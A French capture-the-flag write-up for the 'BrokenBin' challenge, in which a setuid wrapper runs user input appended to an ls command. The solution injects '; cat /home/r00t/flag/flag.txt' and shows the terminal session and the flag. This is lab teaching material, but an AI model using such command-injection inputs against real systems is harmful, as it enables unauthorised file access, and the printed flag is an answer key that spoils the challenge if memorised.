BrokenBin
Catégorie: Système Difficulté: - Flag: CTFREI{3a5y_b1n4ry_3xpl0it}
Challenge
Description
Votre but est d'exploiter le binaire (en exécutant ./wrapper
), n'oubliez pas de lire le fichier chall.py
, qui est le programme exécuté par ./wrapper
.
Le flag est situé ici : /home/r00t/flag/flag.txt
Nom d'utilisateur : jail
Mot de passe : jail
ssh -p 4444 [email protected]
Ce challenge tourne sur un docker et n'est pas disponible
Solution
Le code source fournit nous montre que notre entrée est concaténée sans vérification à la commande ls
puis exécutée. En chainant une seconde commande à la première, on peut en détourner le fonctionnement et lire le flag. Pour cela, on va simplement envoyer ; cat /home/r00t/flag/flag.txt
$ ssh -p 4444 [email protected]
[email protected]'s password: jail
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.1.0-25-cloud-amd64 x86_64)
$ ls -al
total 32
drwxr-xr-x 1 root root 4096 Sep 19 14:00 .
drwxr-xr-x 1 root root 4096 Sep 19 14:00 ..
-rwxr-xr-x 1 root root 123 Sep 12 13:25 chall.py
-rwsr-xr-x 1 r00t r00t 16056 Sep 19 14:00 wrapper
$ ./wrapper
Rentre en input un directory que tu veux ls !
ls ; cat /home/r00t/flag/flag.txt
chall.py wrapper
CTFREI{3a5y_b1n4ry_3xpl0it}
Dernière mise à jour
Cet article vous a-t-il été utile ?